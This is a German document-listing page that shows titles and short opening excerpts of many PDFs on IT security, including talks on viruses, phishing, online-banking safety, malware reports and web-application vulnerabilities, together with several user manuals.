PING e.v. Heimvernetzung und Sicherheit im Internet. HobbyTronic 2006. Nächster Vortrag: 12:15 Uhr. PING e.v. Weiterbildung - www.ping. PING e.v. Verein zur Förderung der privaten Internet Nutzung e.v. Heimvernetzung und Sicherheit im Internet HobbyTronic 2006 Nächster Vortrag: 12:15 Uhr PING e.v. Weiterbildung - Übersicht Wie baue ich

Mehr

PC-Treff Gärtringen. Thema: Computerviren & Co Referent: Peter Rudolph. Wolfgang Täuber. In der binären Welt findet man:

PC-Treff Gärtringen. Thema: Computerviren & Co Referent: Peter Rudolph. Wolfgang Täuber. In der binären Welt findet man: PC-Treff Gärtringen Thema: Computerviren & Co Referent: Peter Rudolph. Wolfgang Täuber In der binären Welt findet man: - Störenfriede - Bekämpfer von Störenfieden - und alle anderen, die von beiden eigentlich

Mehr

Konsumenteninformation

Konsumenteninformation Konsumenteninformation BEGRIFFE ABC Account Ist die Berechtigung um eine Dienstleistung im Internet nutzen zu können. Solche Benutzerkonten können kostenpflichtig oder aber auch gratis sein. App Programme

Mehr

Datensicherheit. Datensicherung Datenschutz bei der Internet-Nutzung (bezieht sich auf Windows-Rechner)

Datensicherheit. Datensicherung Datenschutz bei der Internet-Nutzung (bezieht sich auf Windows-Rechner) Datensicherheit Datensicherung Datenschutz bei der Internet-Nutzung (bezieht sich auf Windows-Rechner) Was bedeutet Datensicherheit für uns heute? Ohne digital gespeicherte Daten geht heute nichts mehr

Mehr

BSH-FX (File Exchange) Datenaustausch mit registrierten Mailbox-Usern

BSH-FX (File Exchange) Datenaustausch mit registrierten Mailbox-Usern BSH-FX (File Exchange) Dokumentation für BSH-Mitarbeiter und externe Partner für den Datenaustausch mit registrierten Mailbox-Usern Stand: 24.06.2015, Version 1.01 Inhalt Inhalt... 2 Allgemeines zum BSH-FX

Mehr

Einführung in die Informationstechnik. VII Handyviren Anonym im Netz surfen

Einführung in die Informationstechnik. VII Handyviren Anonym im Netz surfen Einführung in die Informationstechnik VII Handyviren Anonym im Netz surfen 2 Handyschadsoftware erster Handyvirus: 2004 für SymbianOS: Cabir Verbreitung über Bluetooth Ab Herbst 2004 Trojaner Mosquit.a:

Mehr

Sicherheit von Homebanking:

Sicherheit von Homebanking: Netzwerke Linux und Windows Software / Hardware / Server IT-Service / Programmierung Individuelle Beratung Boxhorn-EDV GbR Baierbrunner Str. 3 D-81379 München Boxhorn-EDV GbR Baierbrunner Str. 3 D-81379

Mehr

Malware. Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt. von Eugene Kaspersky. 1. Auflage. Hanser München 2008

Malware. Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt. von Eugene Kaspersky. 1. Auflage. Hanser München 2008 Malware Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt von Eugene Kaspersky 1. Auflage Hanser München 2008 Verlag C.H. Beck im Internet: www.beck.de ISBN 978 3 446 41500 3

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen Andy Kurt Vortrag: 7.11.14 OSX - Computeria Meilen 1 von 10 Andy Kurt Vortrag: 7.11.14 Screen IT & Multimedia AG Webseite: www.screen-online.ch Link Fernwartung: http://screen-online.ch/service/fernwartung.php

Mehr

Gefahren im Internet

Gefahren im Internet Gefahren im Internet Carl Spitzenberger Christoph Motal Neue Technologien werden Anfangs gerne skeptisch betrachtet 1835 als die erste Eisenbahn zwischen Nürnberg und Fürth eröffnet wurde, wurde ein Gutachten

Mehr

When your browser turns against you Stealing local files

When your browser turns against you Stealing local files Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester

Mehr

SEMINAR. SE Grundlage Methodischen Arbeitens SS 07. Phishing. Seite 1

SEMINAR. SE Grundlage Methodischen Arbeitens SS 07. Phishing. Seite 1 SEMINAR Grundlage Methodischen Arbeitens Phishing Seite 1 Inhaltsverzeichnis 1. Kurzfassung... 3 2. Einführung und Problemstellung... 4 2.1 Einführung... 4 2.2 Problemstellung... 5 3. Geschichte und Entstehung

Mehr

Gehackte Webapplikationen und Malware

Gehackte Webapplikationen und Malware 2014-04-11 Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

ProSecure Sales Training 2/6. Sicherheitsüberblick

ProSecure Sales Training 2/6. Sicherheitsüberblick ProSecure Sales Training 2/6 Sicherheitsüberblick Sicherheit versus Netzwerke Beschränkte Ressourcen (finanziell und mitarbeiterseitig) Das ewige Sicherheits- und Netzwerkrätsel Die Tendenz geht eher zu

Mehr

Datenschutzerklärung. Published: 2009-08-03 Author: 42media services GmbH

Datenschutzerklärung. Published: 2009-08-03 Author: 42media services GmbH Datenschutzerklärung Published: 2009-08-03 Author: 42media services GmbH Inhaltsverzeichnis Datenschutzerklärung... 4 Datenverarbeitung auf dieser Internetseite... 4 Cookies... 4 Newsletter... 4 Auskunftsrecht...

Mehr

Man-in-the-Middle-Angriffe auf das chiptan comfort-verfahren im Online-Banking

Man-in-the-Middle-Angriffe auf das chiptan comfort-verfahren im Online-Banking Man-in-the-Middle-Angriffe auf das chiptan comfort-verfahren im Online-Banking RedTeam Pentesting GmbH 23. November 2009 ChipTAN comfort ist ein neues Verfahren, welches mit Hilfe eines vertrauenswürdigen

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

IT-SECURITY. Detect. Act. Protect.

IT-SECURITY. Detect. Act. Protect. Oktober 2015 IT-SECURITY Detect. Act. Protect. Security-Plattform für SAP 360 0 Sicherheit EDR-Technologie Security, die mitdenkt IT Blackout Deep Security Sicherung privilegierter Benutzerkonten Assessment

Mehr

Schutz vor Phishing und Trojanern

Schutz vor Phishing und Trojanern Schutz vor Phishing und Trojanern So erkennen Sie die Tricks! Jeder hat das Wort schon einmal gehört: Phishing. Dahinter steckt der Versuch von Internetbetrügern, Bankkunden zu Überweisungen auf ein falsches

Mehr

Installation SuperWebMailer

Installation SuperWebMailer Installation SuperWebMailer Die Installation von SuperWebMailer ist einfach gestaltet. Es müssen zuerst per FTP alle Dateien auf die eigene Webpräsenz/Server übertragen werden, danach ist das Script install.php

Mehr

Malware und Spam 2008

Malware und Spam 2008 Malware und Spam 2008 Aktuelle Trends und Gegenmaßnahmen Ralf Benzmüller G DATA Security Labs Geschützt. Geschützter. G DATA. Agenda G DATA AntiVirus 2008 Malware G DATA Internet Security 2008 Firewall

Mehr

Der Weg zu Ihrem Online-Konto mit PIN/TAN

Der Weg zu Ihrem Online-Konto mit PIN/TAN Der Weg zu Ihrem Online-Konto mit PIN/TAN Allgemeines zur Kontensicherheit/Sicherheitshinweis Wir machen Sie darauf aufmerksam, dass die Sparkasse keine vertraulichen Daten (z.b. PIN und/oder TAN) per

Mehr

MobiDM-App Handbuch für Windows Phone

MobiDM-App Handbuch für Windows Phone MobiDM-App Handbuch für Windows Phone Dieses Handbuch beschreibt die Installation und Nutzung der MobiDM-App für Windows Phone Version: x.x MobiDM-App Handbuch für Windows Phone Seite 1 Inhalt 1. WILLKOMMEN

Mehr

Ruby on Rails Sicherheit. Heiko Webers 42@rorsecurity.info

Ruby on Rails Sicherheit. Heiko Webers 42@rorsecurity.info Ruby on Rails Sicherheit Heiko Webers 42@rorsecurity.info Heiko Webers Ruby On Rails Security Project: www.rorsecurity.info E-Book Ruby On Rails Security Ruby On Rails Security Audits Webanwendungen Trends

Mehr

News: Aktuelles aus Politik, Wirtschaft und Recht

News: Aktuelles aus Politik, Wirtschaft und Recht News: Aktuelles aus Politik, Wirtschaft und Recht Januar/2013 Internet-Sicherheitsexperten führten auf drei Testpersonen einen gezielten Angriff durch. Das beunruhigende Fazit des Tests im Auftrag von

Mehr

Abruf und Versand von Mails mit Verschlüsselung

Abruf und Versand von Mails mit Verschlüsselung Bedienungstip: Verschlüsselung Seite 1 Abruf und Versand von Mails mit Verschlüsselung Die folgende Beschreibung erklärt, wie man mit den üblichen Mailprogrammen die E- Mailabfrage und den E-Mail-Versand

Mehr

MOBILE MALWARE REPORT

MOBILE MALWARE REPORT TRUST IN MOBILE MALWARE REPORT GEFAHRENBERICHT: H2/2014 INHALTE Auf einen Blick 03-03 Prognosen und Trends 04-04 Aktuelle Lage: Täglich 4.500 neue Android-Schaddateien 05-05 Drittanbieter App-Stores 06-07

Mehr

Schwachstellenanalyse 2013

Schwachstellenanalyse 2013 Schwachstellenanalyse 2013 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 09.01.2014 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

Das lukrative Geschäft mit falscher Antiviren- Software

Das lukrative Geschäft mit falscher Antiviren- Software Das lukrative Geschäft mit falscher Antiviren- Software November 2009 Autor: Renato Ettisberger SWITCH 2009 1. Das Geschäftsmodell Nie waren die Computersysteme von Firmen und Privaten dermassen vielen

Mehr

Das Praxisbuch E-Mail für Senioren

Das Praxisbuch E-Mail für Senioren Rainer Gievers Das Praxisbuch E-Mail für Senioren Eine verständliche Einführung in die E-Mail-Nutzung auf PC, Handy und Tablet Leseprobe Gedruckte Ausgabe: ISBN 978-3-938036-93-8 Ebook: ISBN 978-3-938036-94-5

Mehr

Audit von Authentifizierungsverfahren

Audit von Authentifizierungsverfahren Audit von Authentifizierungsverfahren Walter Sprenger, Compass Security AG Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41 55-214 41 61 team@csnc.ch

Mehr

AV-TEST. Sicherheitslage Android

AV-TEST. Sicherheitslage Android AV-TEST Sicherheitslage Android Sicherheitslage Android 1 SICHERHEITSLAGE ANDROID MEHR ALS 30 IT-SPEZIALISTEN MEHR ALS 15 JAHRE EXPERTISE IM BEREICH ANTIVIREN-FORSCHUNG UNTERNEHMENSGRÜNDUNG 2004 EINE DER

Mehr

Neue Herausforderungen des Selbstdatenschutzes im Internet

Neue Herausforderungen des Selbstdatenschutzes im Internet Neue Herausforderungen des Selbstdatenschutzes im Internet Christian Krause Technisches Referat im ULD Windows 98 Vielleicht Windows XP. Aber dann natürlich kein Auto-Update! denn Micro$oft ist böse. Internet

Mehr

Gefahren im Internet

Gefahren im Internet by Christian Roth April 2014 Gefahren im Internet - Spam oder Junk-Mails Seite 2 Es wird immer fieser vorgegangen. Nehmen Sie sich genügend Zeit um Ihre Mails zu bearbeiten. In der Eile geht man schnell

Mehr

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit WINDOWS 7 Druckerkonfiguration - Systemsteuerung - Sicherheit Druckerverwaltung ab Seite 91 = Standarddrucker Druckaufträge verwalten ab Seite 96 Systemsteuerung ab Seite 97 System Information über das

Mehr

ProSecure Sales Training 4/6. Vielseitige Verteidigung des SMB

ProSecure Sales Training 4/6. Vielseitige Verteidigung des SMB ProSecure Sales Training 4/6 Vielseitige Verteidigung des SMB Vielseitige Verteidigung Firewall / Verbindungs-Screening (Hacking, Angreifer, DoS-Attacken ) Virus- / Malware-Scanning (Vermischte Gefahren,

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Analyse der Entwicklung von Malware

Analyse der Entwicklung von Malware TU Darmstadt schmid@vwl.tu-darmstadt.de 1. Kryptowochenende 01.07.2006 Gliederung 1 Chronologische Betrachtung Übersicht über die Eigenschaften der Viren 2 3 4 Die Motivation Definitionen Chronologische

Mehr

So viel Schutz muss sein!

So viel Schutz muss sein! So viel Schutz muss sein! So sollten Sie Ihren privaten Rechner absichern. Ein Leitfaden für Endanwender. Bitte unbedingt umsetzen! Montag, 01.12.2008 Mark Semmler Security Services l l Tel: +49.. 6151.

Mehr

Computersicherheit im Informationszeitalter. 15.12.2014 / Seth Buchli

Computersicherheit im Informationszeitalter. 15.12.2014 / Seth Buchli Computersicherheit im Informationszeitalter 15.12.2014 / Seth Buchli Inhalt Computersicherheit... 3 Wireless Sicherheit... 3 Sichere Passwörter erzeugen und merken... 4 Auskünfte am Telefon... 4 Post Werbegeschenke...

Mehr

mobile Geschäftsanwendungen

mobile Geschäftsanwendungen Virenschutz & mobile Geschäftsanwendungen Roman Binder Security Consultant, Sophos GmbH Agenda Die Angreifer Aktuelle Bedrohungen Malware-Trends Die Zukunft Schutzmaßnahmen Die Angreifer Professionalisierung

Mehr

Reale Angriffsszenarien Clientsysteme, Phishing & Co.

Reale Angriffsszenarien Clientsysteme, Phishing & Co. IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Clientsysteme, Phishing & Co. hans-joachim.knobloch@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Viren

Mehr

Bedienungsanleitung für den SecureCourier

Bedienungsanleitung für den SecureCourier Bedienungsanleitung für den SecureCourier Wo kann ich den SecureCourier nach der Installation auf meinem Computer finden? Den SecureCourier finden Sie dort, wo Sie mit Dateien umgehen und arbeiten. Bei

Mehr

s-sparkasse Verlassen Sie sich darauf: giropay ist sicher. Sparkassen-Finanzgruppe

s-sparkasse Verlassen Sie sich darauf: giropay ist sicher. Sparkassen-Finanzgruppe s-sparkasse Verlassen Sie sich darauf: giropay ist sicher. Sparkassen-Finanzgruppe Mit Sicherheit: giropay. Online-Bezahlverfahren müssen einfach, schnell und sicher sein. Und genau diese Kriterien erfüllt

Mehr

ProSecure Sales Training 3/6. Beispiele für Attacken

ProSecure Sales Training 3/6. Beispiele für Attacken ProSecure Sales Training 3/6 Beispiele für Attacken Einleitung Recent Breach Attacke am Freitag, 14. November 2008 Ein weiteres großes, internationales Kreditinstitut sah sein Computersystem von unbekannten

Mehr

ANTWORTEN AUF HÄUFIGE FRAGEN TKB E-BANKING

ANTWORTEN AUF HÄUFIGE FRAGEN TKB E-BANKING Andere Fragen? Rufen Sie uns an unter 0848 111 444 oder schreiben Sie uns. Bitte Thema wählen TKB E-Banking Stichwortsuche (optional) 72 Einträge gefunden Treffer 16-30 von 72 1 2 3 4 5 16 Wie schütze

Mehr

Handbuch für Android 1.5

Handbuch für Android 1.5 Handbuch für Android 1.5 1 Inhaltsverzeichnis 1 Leistungsumfang... 3 1.1 Über Boxcryptor Classic... 3 1.2 Über dieses Handbuch... 3 2. Installation... 5 3. Grundfunktionen... 5 3.1 Einrichtung von Boxcryptor

Mehr

PC Sicherheit. Microsoft Press. Michaela Zocholl. einfach Wipp & War

PC Sicherheit. Microsoft Press. Michaela Zocholl. einfach Wipp & War Michaela Zocholl 2008 AGI-Information Management Consultants May be used for personal purporses only or by libraries associated to dandelon.com network. einfach Wipp & War PC Sicherheit Microsoft Press

Mehr

Sophos Virenscanner Konfiguration

Sophos Virenscanner Konfiguration Ersteller/Editor Ulrike Hollermeier Änderungsdatum 12.05.2014 Erstellungsdatum 06.07.2012 Status Final Konfiguration Rechenzentrum Uni Regensburg H:\Sophos\Dokumentation\Sophos_Konfiguration.docx Uni Regensburg

Mehr

Herzlich Willkommen zum Live Hacking. Die Hacker: Ralf Wildvang Thomas Pusch

Herzlich Willkommen zum Live Hacking. Die Hacker: Ralf Wildvang Thomas Pusch Herzlich Willkommen zum Live Hacking Die Hacker: Ralf Wildvang Thomas Pusch 1 Vorstellung Ralf Wildvang Senior Berater ML Consulting Berater und Trainer in der Kampagne Sicher gewinnt des Bundes Erstellung

Mehr

Handbuch für ios 1.4 1

Handbuch für ios 1.4 1 Handbuch für ios 1.4 1 Inhaltsverzeichnis 1. Leistungsumfang... 3 1.1 Über Boxcryptor Classic... 3 1.2 Über dieses Handbuch... 4 2. Installation... 5 3. Grundfunktionen... 6 3.1. Einrichtung von Boxcryptor

Mehr

IT-Security Herausforderung für KMU s

IT-Security Herausforderung für KMU s unser weitblick. Ihr Vorteil! IT-Security Herausforderung für KMU s Christian Lahl Agenda o IT-Sicherheit was ist das? o Aktuelle Herausforderungen o IT-Sicherheit im Spannungsfeld o Beispiel: Application-Control/

Mehr

Sicherheit im Internet! Ein Mythos? Patrik Werren Sales Engineer Winterthur 26. Januar 2011

Sicherheit im Internet! Ein Mythos? Patrik Werren Sales Engineer Winterthur 26. Januar 2011 Patrik Werren Sales Engineer Winterthur 26. Januar 2011 AGENDA Gefahren im Internet Technische Gefahren Cyber Kriminalität Bin ich noch sicher? SPAM und Lösungen dagegen GEFAHREN IM INTERNET GEFAHREN IM

Mehr

Seminar: Sicheres Online Banking Teil 1

Seminar: Sicheres Online Banking Teil 1 Lehrstuhl Netzarchitekturen und Netzdienste Institut für Informatik Technische Universität München Seminar: Sicheres Online Banking Teil 1 WS 2008/2009 Hung Truong manhhung@mytum.de Betreuer: Heiko Niedermayer

Mehr

Mobile Data Monitor Erfassung, Überwachung und Analyse von übertragenen Datenmengen

Mobile Data Monitor Erfassung, Überwachung und Analyse von übertragenen Datenmengen Mobile Data Monitor Erfassung, Überwachung und Analyse von übertragenen Datenmengen Testdokumente Semesterarbeit von: Juli 2005 Mobile Data Monitor Seite 71 / 106 5.3 Testing Folgende Tests wurden durchgeführt.

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

Schritt für Schritt zur IT-Spitzenleistung

Schritt für Schritt zur IT-Spitzenleistung Schritt für Schritt zur IT-Spitzenleistung IT-Service und Security Management wirksam gestalten Oliver van de Kamp Security Eye, 14.09.2006, Köln w w w. t u v. c o m Wegbegleiter TÜV Rheinland Secure it

Mehr

Anleitung zum Erstellen und Auspacken eines verschlüsselten Archivs zur Übermittlung personenbezogener Daten per E-Mail 1

Anleitung zum Erstellen und Auspacken eines verschlüsselten Archivs zur Übermittlung personenbezogener Daten per E-Mail 1 personenbezogener Daten per E-Mail 1 Entsprechend der gültigen Verschlüsselungsverordnung http://www.kirchenrechtwuerttemberg.de/showdocument/id/17403 gilt u.a. 1 (1) Personenbezogene Daten und andere

Mehr